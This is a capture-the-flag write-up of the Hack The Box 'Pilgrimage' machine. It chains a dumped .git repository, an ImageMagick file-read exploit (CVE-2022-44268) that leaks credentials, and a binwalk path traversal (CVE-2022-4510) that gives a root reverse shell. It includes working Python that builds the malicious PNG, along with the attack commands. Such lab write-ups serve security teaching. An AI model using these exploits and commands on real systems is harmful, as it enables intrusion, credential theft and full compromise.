Pilgrimage

Writeup Hack The Box Pilgrimage


Last updated 11 months ago


Port Scanning

First, we perform port scanning on the machine.

sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.219

We find an exposed .git directory on the website.

Exploitation

After finding the .git directory, we can dump it to recover the source code using git-dumper (https://github.com/arthaud/git-dumper).

python3 git_dumper.py http://pilgrimage.htb/.git/ Pilgrimage

Now, move into the dumped Pilgrimage directory.
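As an added example (my code, not part of the original writeup and not git-dumper's implementation), the Python below parses a version-2 .git/index and lists the tracked paths, modes and blob hashes. That listing is what an exposed .git gives you even before any objects are recovered, and it tells you which files to fetch. The sample index is constructed inline with placeholder file names; it is not the real Pilgrimage index.

```python
import hashlib
import struct

INDEX_VERSION = 2


def build_index_entry(path: str, mode: int = 0o100644, sha1: bytes = b"\x00" * 20) -> bytes:
    """Serialise one v2 index entry (used only to construct the sample below)."""
    name = path.encode()
    # ctime/mtime (sec+nsec), dev, ino, mode, uid, gid, size: ten big-endian uint32s
    fixed = struct.pack(">10I", 0, 0, 0, 0, 0, 0, mode, 0, 0, 0)
    flags = struct.pack(">H", len(name) & 0xFFF)  # low 12 bits hold the name length
    entry = fixed + sha1 + flags + name
    # entries are NUL-padded (1 to 8 bytes) to a multiple of 8
    return entry + b"\x00" * (8 - len(entry) % 8)


def build_index(paths) -> bytes:
    """Header + sorted entries + trailing SHA-1 over everything before it."""
    body = b"DIRC" + struct.pack(">II", INDEX_VERSION, len(paths))
    for p in sorted(paths):
        body += build_index_entry(p)
    return body + hashlib.sha1(body).digest()


def parse_git_index(data: bytes):
    """Return [(path, mode, sha1_hex)] from a version-2 .git/index blob."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC" or version != INDEX_VERSION:
        raise ValueError(f"unsupported index: {sig!r} v{version}")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or tampered dump?)")
    entries, off = [], 12
    for _ in range(count):
        mode = struct.unpack(">I", data[off + 24:off + 28])[0]
        sha1_hex = data[off + 40:off + 60].hex()
        flags = struct.unpack(">H", data[off + 60:off + 62])[0]
        name_len = flags & 0xFFF
        if name_len < 0xFFF:
            name = data[off + 62:off + 62 + name_len]
        else:  # long names saturate the length field; scan for the NUL instead
            name = data[off + 62:data.index(b"\x00", off + 62)]
        entries.append((name.decode(), mode, sha1_hex))
        entry_len = 62 + len(name)
        off += entry_len + (8 - entry_len % 8)
    return entries


# Constructed sample: placeholder paths, not the real Pilgrimage repository contents.
SAMPLE_PATHS = ["index.php", "assets/css/style.css", "magick"]
SAMPLE_INDEX = build_index(SAMPLE_PATHS)

if __name__ == "__main__":
    for path, mode, sha in parse_git_index(SAMPLE_INDEX):
        print(f"{mode:06o} {sha} {path}")
```

Run it against a real dump with `parse_git_index(open(".git/index", "rb").read())`; the checksum check catches the common case where the index was only partially downloaded.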

In index.php, we see that the application uses the magick binary to process uploaded images:

exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);

The magick binary is ImageMagick, an open-source suite for editing and converting images. Because uploads are passed straight to it, the installed ImageMagick version decides what an attacker can do with a crafted file.

Searching Google, I found this exploit for ImageMagick 7.1.0-49 (CVE-2022-44268, an arbitrary file read triggered by a crafted PNG):

  • https://www.exploit-db.com/exploits/51261

  • https://github.com/voidz0r/CVE-2022-44268

After downloading the exploit, build and run it to generate an image carrying the payload; the argument is the path of the file to read from the target:

cargo run "/etc/passwd"

Now, upload the generated image.png to the target.

Next, download the converted image and inspect its metadata:

identify -verbose 64a0e52437392.png

The contents of the requested file appear as a hex string under "Raw profile type". Convert the hex to text with xxd:

echo "hex value here" | xxd -r -p

Back in index.php, we also find that the website uses a SQLite database stored at /var/db/pilgrimage. We can read that file with the same exploit by generating a new image that targets /var/db/pilgrimage.

Again, upload the image to the website and download the converted image. Next, pull the hex value from identify and decode it with xxd; since the database is binary, redirect the output to a file rather than the terminal.

Since the hex value is too long to paste comfortably on the command line, save the command into a script.

nano db.sh

Inside db.sh, add this line:

#!/bin/bash
echo "hex value" | xxd -r -p

Then execute this command.

bash db.sh > asuka.sqlite
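The two file reads above (/etc/passwd and then the SQLite database) are the same procedure: craft a PNG whose tEXt chunk asks ImageMagick to load a file as a profile, then decode the hex that identify prints back. As an added example (my code, not the linked Rust exploit and not part of the original writeup), the Python below builds such a PNG from scratch and parses the "Raw profile type" block out of identify -verbose output, so the xxd step is no longer manual. The identify excerpt and the passwd lines are constructed samples; the exact indentation of real identify output may differ, which is why the parser strips whitespace and stops at the next property line.

```python
import re
import struct
import textwrap
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Length-prefixed PNG chunk; the CRC32 covers type and body but not the length."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_poc_png(target_path: str) -> bytes:
    """1x1 RGB PNG carrying a tEXt chunk with keyword 'profile' and the target path as text.

    Vulnerable ImageMagick (7.1.0-49 and earlier) treats that keyword as a request to load
    the named file as a profile and copies its bytes into the converted image's metadata,
    which is the CVE-2022-44268 file-read primitive.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00" + b"\xff\x00\x00")       # filter byte + one red pixel
    text = b"profile\x00" + target_path.encode()
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def png_chunks(data: bytes):
    """Walk the chunks of a PNG, verifying each CRC; returns [(type, body)]."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    chunks, off = [], 8
    while off < len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", data[off + 8 + length:off + 12 + length])
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError(f"bad CRC in {ctype!r}")
        chunks.append((ctype, body))
        off += 12 + length
    return chunks


def extract_raw_profile(identify_output: str) -> bytes:
    """Decode the hex dump that `identify -verbose` prints under 'Raw profile type'.

    Assumed layout: the header line, an optional blank line, a decimal byte count,
    then lines of hex until the next property line.
    """
    lines = iter(identify_output.splitlines())
    for line in lines:
        if line.strip().startswith("Raw profile type"):
            break
    else:
        raise ValueError("no 'Raw profile type' block in identify output")
    expected, hex_parts = None, []
    for line in lines:
        s = line.strip()
        if not s:
            continue
        if expected is None and s.isdigit():
            expected = int(s)
            continue
        if re.fullmatch(r"[0-9a-fA-F]+", s):
            hex_parts.append(s)
            continue
        break  # the next property line ends the block
    data = bytes.fromhex("".join(hex_parts))
    return data[:expected] if expected is not None else data


# Constructed sample: fake passwd lines and a hand-built identify -verbose excerpt.
SAMPLE_PROFILE = b"root:x:0:0:root:/root:/bin/bash\nemily:x:1000:1000::/home/emily:/bin/bash\n"
SAMPLE_IDENTIFY = (
    "Image: 64a0e52437392.png\n  Format: PNG (Portable Network Graphics)\n  Properties:\n"
    "    Raw profile type: \n\n" + f"{len(SAMPLE_PROFILE):8d}\n"
    + "\n".join(textwrap.wrap(SAMPLE_PROFILE.hex(), 72))
    + "\n    date:create: 2023-07-01T00:00:00+00:00\n"
)

if __name__ == "__main__":
    with open("image.png", "wb") as f:
        f.write(build_poc_png("/etc/passwd"))
    print(extract_raw_profile(SAMPLE_IDENTIFY).decode())
```

For the database read, pipe the real output through the parser and write the bytes to a file: `open("asuka.sqlite", "wb").write(extract_raw_profile(open("identify.txt").read()))`.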

Now we can read the database with the sqlite3 client.

➜  tmp sqlite3 asuka.sqlite 
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite> 

Now we can use the credentials emily / abigchonkyboi123 to log in over SSH.

Get Low User

ssh emily@pilgrimage.htb

Privilege Escalation

Using pspy, which we upload after getting the shell as emily, we find a process running as UID 0 (root) that could be our path to root:

/bin/bash /usr/sbin/malwarescan.sh 
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/

This is the content of malwarescan.sh:

#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

In summary, the script watches /var/www/pilgrimage.htb/shrunk/ with inotifywait, runs binwalk -e as root on every newly created file, and deletes the file if binwalk's output contains a blacklisted string. The important detail is not the blacklist but that root-privileged binwalk extraction runs on files we can place in that directory (as emily, or through the image upload).

Checking the binwalk version shows that this binwalk is vulnerable to CVE-2022-4510, a path traversal in binwalk's PFS extractor that lets a crafted file write outside the extraction directory. Since binwalk runs as root here, that write is enough to reach code execution.
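As an added illustration (my code, not binwalk's source and not the linked exploit), the Python below contrasts the unchecked path join that CVE-2022-4510 class bugs rely on with a hardened version that confines extraction to the output directory. The extraction directory, the plugin directory and the archive entry names are constructed assumptions; as I understand the exploit chain, a traversal into root's ~/.config/binwalk/plugins is what turns the arbitrary write into code execution, because binwalk imports .py files from that directory on its next run.

```python
import os

# Constructed paths: binwalk -e writes into "_<name>.extracted" next to the input file.
OUTDIR = "/var/www/pilgrimage.htb/shrunk/_asuka.png.extracted"
# Assumed drop target: root's user plugin directory, since malwarescan.sh runs binwalk as root.
PLUGIN_DIR = "/root/.config/binwalk/plugins"


def unsafe_dest(outdir: str, name: str) -> str:
    """The pattern behind CVE-2022-4510: the archive-supplied file name is joined to the
    extraction directory as-is, so '../' segments (or an absolute name) escape it."""
    return os.path.join(outdir, name)


def safe_dest(outdir: str, name: str) -> str:
    """Hardened form: resolve the candidate path and require it to stay under outdir."""
    base = os.path.realpath(outdir)
    if os.path.isabs(name) or "\x00" in name:
        raise ValueError(f"rejected archive path {name!r}")
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path traversal blocked: {name!r} -> {candidate}")
    return candidate


def traversal_to(outdir: str, target: str) -> str:
    """Relative name an attacker would put in the archive to reach `target` from outdir."""
    depth = len([p for p in os.path.realpath(outdir).split("/") if p])
    return "../" * depth + target.lstrip("/")


def classify(outdir: str, names):
    """For each archive name, report where the naive join lands and whether it escapes."""
    base = os.path.realpath(outdir)
    report = []
    for n in names:
        resolved = os.path.realpath(unsafe_dest(base, n))
        report.append((n, resolved, os.path.commonpath([base, resolved]) != base))
    return report


SAMPLE_NAMES = [
    "bin/busybox",                                      # legitimate entry
    traversal_to(OUTDIR, PLUGIN_DIR + "/binwalk.py"),   # CVE-2022-4510 style entry
    "/etc/cron.d/backdoor",                             # absolute: os.path.join drops outdir
]

if __name__ == "__main__":
    for name, resolved, escapes in classify(OUTDIR, SAMPLE_NAMES):
        print(("ESCAPES " if escapes else "ok      ") + name + " -> " + resolved)
```

The commonpath check after realpath is the part that matters: normalising the string alone is not enough if a previously extracted symlink points outside the directory, so the resolved path has to be compared, not the textual one.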

We can use this script: https://github.com/electr0sm0g/CVE-2022-4510

Before that, on our local machine run nc to listen on port 1337.

Upload the script to the target machine and generate the reverse shell payload; the arguments are a base image, our listener IP and the listener port:

python3 RCE_Binwalk.py asuka.png 10.10.14.7 1337

Next, copy the generated image into /var/www/pilgrimage.htb/shrunk/ so the watcher picks it up.

Using pspy, we can confirm that binwalk executes our payload.

Checking our netcat listener, we receive a connection from the target as root.

(pspy, the process monitor used throughout this section, was uploaded to the target after obtaining the emily shell; that is how the root-owned malwarescan.sh process was spotted in the first place.)
